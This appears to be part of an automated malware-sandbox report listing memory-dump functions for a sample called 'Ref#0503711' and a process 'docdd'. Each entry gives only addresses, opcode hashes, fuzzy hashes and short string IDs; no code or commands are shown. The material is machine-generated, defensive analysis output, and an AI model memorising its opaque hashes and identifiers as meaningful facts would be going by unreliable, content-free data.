                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2471ae56e9779860faec2120ff901e7b318cf526b37374319dea78d0ce68bf8e
                                                                • Instruction ID: 9f338ac185f3422d15d3c581d4a328cbed96bace828c7fe0abcb2e276166b2f5
                                                                • Opcode Fuzzy Hash: 2471ae56e9779860faec2120ff901e7b318cf526b37374319dea78d0ce68bf8e
                                                                • Instruction Fuzzy Hash: 5B916A70E82218CFEB94CFA8D884BEDBBF2FB49309F10946AD459A7251DB755984CF40
                                                                Function 060E5398 Relevance: .2, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3ae91197fb66940d53f577be6ae915e8ba9a116cfa53c423802caa446e99dc6
                                                                • Instruction ID: 04c51f75d5b7d3b54f64d70ff9c5d8586f09564448ed45ec6f1774769b66a6b8
                                                                • Opcode Fuzzy Hash: b3ae91197fb66940d53f577be6ae915e8ba9a116cfa53c423802caa446e99dc6
                                                                • Instruction Fuzzy Hash: 13914B70E85228CFEB94CFA8D884BEDBBF2FB49309F10946AD419A7250DB755984CF40
                                                                Function 0197E1FF Relevance: .2, Instructions: 213COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86a2ac555a6a52201782be529421ab1d3d9d0d4e28f8c798acc0eaf277772461
                                                                • Instruction ID: 53176e20612b701c5242520139bf327d2a782577eb8a351e7564e94be47b9289
                                                                • Opcode Fuzzy Hash: 86a2ac555a6a52201782be529421ab1d3d9d0d4e28f8c798acc0eaf277772461
                                                                • Instruction Fuzzy Hash: 3091DCB0D0A218CFEB14DFA9C9497EEBBF1BF48305F2085AAD419B7250E7780A45CB54
                                                                Function 060E56DE Relevance: .2, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ee2b37a92d7db586267087acab2279d184873aa6a621cfb170239039dbb3be0
                                                                • Instruction ID: ce7d4816d781e430a00f7808459b8373083b2f2812abe5111e23b1e98f29852b
                                                                • Opcode Fuzzy Hash: 8ee2b37a92d7db586267087acab2279d184873aa6a621cfb170239039dbb3be0
                                                                • Instruction Fuzzy Hash: 46912B70E86218CFEB95CF68D884BEDBBF2FB49309F10946AD409A7251D7755984CF40
                                                                Function 0635D2D8 Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46d02829084e659ce4342de2c397e4d909ccd0df58b7f1911affc199c6acbc63
                                                                • Instruction ID: 2d24a583aa1dd98995c36a8054e7f6aeb59f6cb9c03904ff9f3b081a70f7c519
                                                                • Opcode Fuzzy Hash: 46d02829084e659ce4342de2c397e4d909ccd0df58b7f1911affc199c6acbc63
                                                                • Instruction Fuzzy Hash: E18149B0D04318CFEBA4DFA5C844BDDBBB5BF89300F5190A9C809A7250DB749989CF85
                                                                Function 01972E61 Relevance: .2, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb167ba8cce37b004f3af6df7bf6885ca5a93b76e03a84471bf95305bb7bc21a
                                                                • Instruction ID: 57c625234f485690dc12a402730bc31a3f6708f3e1f117c3d164bb7c2d59b743
                                                                • Opcode Fuzzy Hash: bb167ba8cce37b004f3af6df7bf6885ca5a93b76e03a84471bf95305bb7bc21a
                                                                • Instruction Fuzzy Hash: 91614E32F205268FD715DB69CC84A5EB7E3AFC8711F1A8164E409DB369DE35EC028B80
                                                                Function 060C0006 Relevance: .2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94baba4cd8ad93b63562a6a81ef9bc609fba95c0b682d3131b1e2ae87533dca3
                                                                • Instruction ID: 7a5ce06b107d8a980c18790d2cf305670bf9e1ced2b268802697e0146c1a12b2
                                                                • Opcode Fuzzy Hash: 94baba4cd8ad93b63562a6a81ef9bc609fba95c0b682d3131b1e2ae87533dca3
                                                                • Instruction Fuzzy Hash: F271CBB1D056948FEB29CF2A8C846D5BEB3AFCA314F19C0EA94886B115D7720A85DF41
                                                                Function 060A706B Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5a54f51498a660d4b573ad31d18c250d1012cfd4f189a277900d08c371f9520
                                                                • Instruction ID: 425da4fa29ebc7e7ba101efeb604c42b1360c774c8884c5c06ef6b24e36242d1
                                                                • Opcode Fuzzy Hash: a5a54f51498a660d4b573ad31d18c250d1012cfd4f189a277900d08c371f9520
                                                                • Instruction Fuzzy Hash: FD512274D86218DFEB94CFE8D894BEDBBF2EB89345F10812AD408A7250D7785985CF40
                                                                Function 060A7078 Relevance: .1, Instructions: 139COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 595de7ee33fce2844878a807e56129c0143392b5d47faca0b37ff7dfe6d5ea88
                                                                • Instruction ID: c71082f6512c5ad040604f679d756656e019d693dc0e22ba63830f70f6ede55c
                                                                • Opcode Fuzzy Hash: 595de7ee33fce2844878a807e56129c0143392b5d47faca0b37ff7dfe6d5ea88
                                                                • Instruction Fuzzy Hash: D3511274D86208DFEB94CFA8D894BEDBBF2EB89345F10902AD409A7250D7785985CF40
                                                                Function 060C0628 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42e2de4d9d0215b27c58980dec82798d7b6d50448efe4951737647c81b454ed7
                                                                • Instruction ID: 387d6e606620a3bbf8129c8689a19125d8eb86bdb0d23f0fe992acbe7b0c63dc
                                                                • Opcode Fuzzy Hash: 42e2de4d9d0215b27c58980dec82798d7b6d50448efe4951737647c81b454ed7
                                                                • Instruction Fuzzy Hash: 37619C74D41628CBDBA4DF25CD84B9DBBF1BB88311F04D1EA948EA2254DB365AC5CF80
                                                                Function 060C0040 Relevance: .1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40ff39c310430deacb04840019f2f2bade63262d40cfd4bd43506dd5aef03f0d
                                                                • Instruction ID: bbbba5d538a84ef0cfdfd1e85aa76bc666fe77c4c897416fece79ebf2a7ff339
                                                                • Opcode Fuzzy Hash: 40ff39c310430deacb04840019f2f2bade63262d40cfd4bd43506dd5aef03f0d
                                                                • Instruction Fuzzy Hash: 71514CB1D056688BEB68CF2B8D442CAFAF3AFC9310F04C1EA954CA6214DB740AD5CF51
                                                                Function 060CD640 Relevance: .1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eda447f9c78c8b760653b6ad6701566b4e59675de9a1172a9b121c9c3b8d2875
                                                                • Instruction ID: ba50e547251b1fc59cd9681bd528c53959c01c14fb9e3664a9b056e29f2e6ef9
                                                                • Opcode Fuzzy Hash: eda447f9c78c8b760653b6ad6701566b4e59675de9a1172a9b121c9c3b8d2875
                                                                • Instruction Fuzzy Hash: 5641CEB4D006489FDB54CFA9D985BADBFF1BF09310F209129E819BB290D7749885CF45
                                                                Function 060E3B38 Relevance: .1, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01d100df883f1b32854f7570f7cad7392d58c6bba831e94cce3ea003a03fd6c8
                                                                • Instruction ID: 69b80c46740e4beb16678e258635f752744a5fae3ae85431643b4175f9fa8041
                                                                • Opcode Fuzzy Hash: 01d100df883f1b32854f7570f7cad7392d58c6bba831e94cce3ea003a03fd6c8
                                                                • Instruction Fuzzy Hash: A241FEB5D00258DFCB00CFA9D584AEEFFF0AB49310F24942AE455B7240C738AA85CF64
                                                                Function 060E3B40 Relevance: .1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc0716c04522c14cba7789a12012c90c2557a38e67cd2c710c085fbc0c0157fa
                                                                • Instruction ID: 35679e0dcb37b07ed242dbe2f0772ef025d78320b53979806c6120947340dfb3
                                                                • Opcode Fuzzy Hash: bc0716c04522c14cba7789a12012c90c2557a38e67cd2c710c085fbc0c0157fa
                                                                • Instruction Fuzzy Hash: A741EEB5D04268DFCB00CFA9D484AEEFFF0AB49310F14906AE455B7240C738AA85CFA4
                                                                Function 06340040 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9238357ace0c9c75711cc021dcb8483f719d18603c6d91dded08b5aedfddc0a1
                                                                • Instruction ID: 5c9ebca17094115be43f251e14560be81411d864e42aeeb6379cb5365a9f39ec
                                                                • Opcode Fuzzy Hash: 9238357ace0c9c75711cc021dcb8483f719d18603c6d91dded08b5aedfddc0a1
                                                                • Instruction Fuzzy Hash: 9B41EB74E046288BEB68DF5AC9546E9FBF6AF88300F04C0EAD50CA7654E7741AC5CF81
                                                                Function 06010012 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ac4da766c2d5002e76a830e58f09a7203fe4cef617f7df900a28cd765755db8
                                                                • Instruction ID: 4816f4273a1ddaef9a4def14e0024730db83877d2e7f1efe0a23abf6efd2299b
                                                                • Opcode Fuzzy Hash: 3ac4da766c2d5002e76a830e58f09a7203fe4cef617f7df900a28cd765755db8
                                                                • Instruction Fuzzy Hash: 5A31CD71D066548FEB59CF6B8C44299BBF3AFC5300F18C1FA9488AA265DA340986CF10
                                                                Function 060AA750 Relevance: .1, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ffe9e898347c9ac7d7c6836ed6489ca8a0b85ecdacd4b9eba5300eff2bae6486
                                                                • Instruction ID: 375c6d46fab27c184c664fb5b9a2022723a258c9ae4e5d03737cec37cd845609
                                                                • Opcode Fuzzy Hash: ffe9e898347c9ac7d7c6836ed6489ca8a0b85ecdacd4b9eba5300eff2bae6486
                                                                • Instruction Fuzzy Hash: B2311470E45258CFEB58CF9AD94479EBBF6BF88300F04D1A9D408A7294EB740986CF40
                                                                Function 06340006 Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e6bc9acd1df6362630af20f06ee9d933582888920781758ddb2c64bac74357b
                                                                • Instruction ID: 7f220dbf0d8c4fb608b932b2b8a7beab0267f19151ea7c6cc29225eaebee9f92
                                                                • Opcode Fuzzy Hash: 9e6bc9acd1df6362630af20f06ee9d933582888920781758ddb2c64bac74357b
                                                                • Instruction Fuzzy Hash: E4312B71D057548FEB29CF6AC844299BBF6AF89300F05C0FAD548AA225D7741A86CF51
                                                                Function 01975358 Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b249d5551117dd7a58bd2434a1b7f3a4eb04a54f582930a97d414b23536553e
                                                                • Instruction ID: f89da4b240aa145b33b4412ac6b5eac79f81bd30fd6b70f3afc5eed68b25cb18
                                                                • Opcode Fuzzy Hash: 3b249d5551117dd7a58bd2434a1b7f3a4eb04a54f582930a97d414b23536553e
                                                                • Instruction Fuzzy Hash: BA3194B0D056188BEB68CF6BCC5478EFAF6AFC4304F14C1A9C40CAA265DB750A85CF11
                                                                Function 060CEB78 Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9a3d2ddb6cd31c1a1afbc8d0755a4f2e851b3b4dcf6e13caa7f65c15cb029d05
                                                                • Instruction ID: 7a43396c8300983340979489855e17be12894f484676c7b3ca71b5ec753763d3
                                                                • Opcode Fuzzy Hash: 9a3d2ddb6cd31c1a1afbc8d0755a4f2e851b3b4dcf6e13caa7f65c15cb029d05
                                                                • Instruction Fuzzy Hash: B831D971D006288FEB68CF6BC9446DDFBF3AFC9310F04C5AA9449AB214DB740A858F40
                                                                Function 01975348 Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb8a89d7107f844e2b88a28ccc9cd616ea9e1c329affac0a93cc6b4d4b1df3d7
                                                                • Instruction ID: af0c92f2b8c7d18768c6a0b82e79edeb49d85e6aef1f368bb2a6274b811766a4
                                                                • Opcode Fuzzy Hash: cb8a89d7107f844e2b88a28ccc9cd616ea9e1c329affac0a93cc6b4d4b1df3d7
                                                                • Instruction Fuzzy Hash: 40316CB1D056588BEB68CF6BC85978EFAF3AFC4304F14C1A9C40CAA265DB750985CF40
                                                                Function 060AF080 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19fe50f6263d623a6fdb3ccd39aae46cc420a5b7fec9aab5da26b909b7cbe90b
                                                                • Instruction ID: 1c8af9abcfba4f9140a166c6d39d9d4ad43d06dfc4296bd032f67161a9496092
                                                                • Opcode Fuzzy Hash: 19fe50f6263d623a6fdb3ccd39aae46cc420a5b7fec9aab5da26b909b7cbe90b
                                                                • Instruction Fuzzy Hash: B521DEB5D042589FCB10CFA9D984AEEFBF1EB89320F14902AE805B7250C735A945CFA4
                                                                Function 060AF088 Relevance: .1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab2c3c0e96a89028af08253b4f1b76af773013fca7424d7c092e6d98a38b018c
                                                                • Instruction ID: 0c386b25fd70c1f779517c68bf1e2ebd8bf609567727b70acaa29e6f61eda461
                                                                • Opcode Fuzzy Hash: ab2c3c0e96a89028af08253b4f1b76af773013fca7424d7c092e6d98a38b018c
                                                                • Instruction Fuzzy Hash: 6E21CEB5D042189FCB14CFA9D985AEEFBF4FB49320F10902AE819B7250C735A945CFA5
                                                                Function 060AA740 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2bce42d75123bd2b9c309b0022b9c7e17d7520901329a94f389babec4b335ff
                                                                • Instruction ID: c6e10f0d2cbf78742d77b0b92b85220ea0c81c3ce915e34a48a202af90acc18b
                                                                • Opcode Fuzzy Hash: b2bce42d75123bd2b9c309b0022b9c7e17d7520901329a94f389babec4b335ff
                                                                • Instruction Fuzzy Hash: 6721A7B1E056189BEB58CF9BD94479EFAF7BFC8300F14C16AD508A6264DB740A86CF41
                                                                Function 060A0D00 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_^q$(_^q$(_^q$(_^q
                                                                • API String ID: 0-2697572114
                                                                • Opcode ID: 271eb384f13accc7b565cb72737b16cdd027b72725d785df7b5e9f1a05cb0cf0
                                                                • Instruction ID: 5e50924439ddf60641e89a0bbac42de33aecc25507c14199c59d78116de18c29
                                                                • Opcode Fuzzy Hash: 271eb384f13accc7b565cb72737b16cdd027b72725d785df7b5e9f1a05cb0cf0
                                                                • Instruction Fuzzy Hash: 5871D075A442448FCB45DFB8C8544AEBFF2EF8A340B1444A9E5869F362DB35DC86CB90
                                                                Function 0621090C Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $#$($;
                                                                • API String ID: 0-291558309
                                                                • Opcode ID: 175a9e38319520dc1351cb22d863e5980e456f63745b34dc0b4200ea035b566f
                                                                • Instruction ID: 1b4a34738231fe583565b527116157d35a97f4b01bc443e7e40d4d36207cc64a
                                                                • Opcode Fuzzy Hash: 175a9e38319520dc1351cb22d863e5980e456f63745b34dc0b4200ea035b566f
                                                                • Instruction Fuzzy Hash: CA11E6B0868168CFEB64CF15C898BEDB7F4BB25308F5094DAC50A7A145CBB94AC5CF15
                                                                Function 06210FEA Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$$$($F
                                                                • API String ID: 0-3155957929
                                                                • Opcode ID: 12b35ece4b599a2d24b7f93bc668a2343c0841994c1fa679b7860a88b791f855
                                                                • Instruction ID: 283432523391f95bde8563e12d9dabb9cf1fdf2cd01f28d8f8e4146659c4aeea
                                                                • Opcode Fuzzy Hash: 12b35ece4b599a2d24b7f93bc668a2343c0841994c1fa679b7860a88b791f855
                                                                • Instruction Fuzzy Hash: 6C11E8B0858268CFEBA0CF15C884B9DB6F1BB15304F5094C6C44AB7244DB794EC5CF15

                                                                Executed Functions

                                                                Function 00BD11F0 Relevance: 3.1, Strings: 2, Instructions: 601COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 19a22401ce793c6ea362f450a68f6d412910f9fd736de96b61092d9e7647aa38
                                                                • Instruction ID: 72333ef93b23b695d4b80af9b1a0e9f062342aaff38e3b12fd0b2124da3e053f
                                                                • Opcode Fuzzy Hash: 19a22401ce793c6ea362f450a68f6d412910f9fd736de96b61092d9e7647aa38
                                                                • Instruction Fuzzy Hash: FC425B74A012299FDB14CFA9D880AADB7F2FF88305F11C5AAD409EB354DB349946CF90
                                                                Function 00BD11E0 Relevance: 2.9, Strings: 2, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 5f2dfcd655db16b60467fb2f474ebfc908de4c3195ac2e5016fe5a7961301b17
                                                                • Instruction ID: 734e0158c853502521e364e90fc6f433e7435353b44a5774295754ba73feb115
                                                                • Opcode Fuzzy Hash: 5f2dfcd655db16b60467fb2f474ebfc908de4c3195ac2e5016fe5a7961301b17
                                                                • Instruction Fuzzy Hash: 8FE15B75A0022A9FDB14CFB9D884AADB7F2BFC8305F11C569D40AEB355DB3099468F90
                                                                Function 00BD122A Relevance: 2.9, Strings: 2, Instructions: 375COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 97536a9353586f9c3fa569c16fe080101fe540b0e0582c03844427902a1f9412
                                                                • Instruction ID: 732d43d4319410d81715fcb32a353d7536b8b1809137cd799e7451d1b8bd05aa
                                                                • Opcode Fuzzy Hash: 97536a9353586f9c3fa569c16fe080101fe540b0e0582c03844427902a1f9412
                                                                • Instruction Fuzzy Hash: 70E14A75A0112A9FDB14CFB9D844AADB7F2BFC8305F11C569D40AEB354DB30AD468B90
                                                                Function 00BD12A1 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 260122ad5ca58f82ee4a14a3eb765aed8ee8004d07b40d8faff0ef4442a57652
                                                                • Instruction ID: 8a5b08d8a3944d17acc29eeae8fd002bbcc9900fe785546b39dbdf2a8acf981a
                                                                • Opcode Fuzzy Hash: 260122ad5ca58f82ee4a14a3eb765aed8ee8004d07b40d8faff0ef4442a57652
                                                                • Instruction Fuzzy Hash: D7D15C75A0112A9FDB14CFB9D844AADB7F2BFC8305F11C669D40AEB354DB30AD468B90
                                                                Function 00BD0F20 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
